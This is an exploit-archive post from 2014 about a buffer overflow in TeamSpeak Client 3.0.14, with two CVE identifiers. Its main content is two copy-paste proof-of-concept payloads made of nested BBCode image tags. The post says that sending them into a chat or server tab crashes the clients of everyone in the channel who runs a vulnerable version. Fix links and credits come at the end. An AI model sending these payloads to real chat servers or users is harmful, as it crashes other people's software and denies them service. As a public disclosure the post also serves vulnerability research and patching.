Home / exploits TeamSpeak Client 3.0.14 Buffer Overflow
Posted on 07 October 2014
################################################################################################# # # Title : TeamSpeak Client v3.0.14 - Buffer Overflow Vulnerability # Severity : High+/Critical # Reporter(s) : SpyEye & Christian Galeone # Software Version : 3.0.14 & Previous Versions # Software Name : TeamSpeak Client # Software Download Link : http://letoltes.szoftverbazis.hu/IbAi1W2OLVclvRLS2KUGHw/1410984789/teamspeak-3014/TeamSpeak3-Client-win64-3.0.14.exe # Vendor Home : http://teamspeak.com/ # Date(s) : 01/04/2014 - 0r161n4l c0d3 By SpyEye # : 21/05/2014 - v4r14n7 c0d3 By Christian Galeone # Tested in : Win7 - TeamSpeak Client V3.0.14 # CVE(s) : CVE-2014-7221 By SpyEye & CVE-2014-7222 By Christian Galeone # ################################################################################################## # # Effects: # # Mass Crash Client (You & The User(s) Connected With A Vulnerable Version Into YOUR Channel) # # Note: # # The Following Code MUST Be Sent Into The Chat/Server Tab For A Channel/Server Crash Effect. # # PoC: # # 1) Buffer Overflow Vulnerability - # 0r161n4l c0d3 n.1 # By SpyEye # # CVE: CVE-2014-7221 # # [img][img]//http://www.teamspeak.com/templates/teamspeak_v3/images/blank.gif[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser75.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7a.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7b.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser75.png?ver=4.6.0.24[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7z.png?ver=4.6.0.28[/img][/img] # # 2) Buffer Overflow Vulnerability - # v4r14n7 c0d3 n.2 # By Christian Galeone # # CVE: CVE-2014-7222 # # [img][img]\1z[/img][/img][img][img]\2z[/img][/img][img][img]\3z[/img][/img][img][img]\4z[/img][/img][img][img]\5z[/img][/img][img][img]\6z[/img][/img][img][img]\7z[/img][/img][img][img]\8z[/img][/img][img][img]\9z[/img][/img][img][img]\10z[/img][/img][img][img]\11z[/img][/img][img][img]\12z[/img][/img][img][img]\13z[/img][/img][img][img]\14z[/img][/img][img][img]\15z[/img][/img][img][img]\16z[/img][/img][img][img]\17z[/img][/img][img][img]\18z[/img][/img][img][img]\1z[/img][/img][img][img]\2z[/img][/img][img][img]\3z[/img][/img][img][img]\4z[/img][/img][img][img]\5z[/img][/img][img][img]\6z[/img][/img][img][img]\7z[/img][/img][img][img]\8z[/img][/img][img][img]\9z[/img][/img][img][img]\10z[/img][/img][img][img]\11z[/img][/img][img][img]\12z[/img][/img][img][img]\13z[/img][/img] # # Fix: # # http://screech.me/ts3/plugins/antifreeze.html # # OR # # http://www.teamspeak.com/?page=downloads # # Original Source: # # http://r4p3.net/public/ts3bbcodefreeze.txt # # http://r4p3.net/forum/reverse-engineering/38/teamspeak-3-exploit-bb-code-freeze-crash-not-responding/905/ # # Credit(s): # # SpyEye (http://forum.teamspeak.com/member.php/263635-SpyEye) - 0r161n4l 3xpl017 d3v3l0p3r # # Christian Galeone - V4r14n7 3xpl017 d3v3l0p3r # # ##################################################################################################
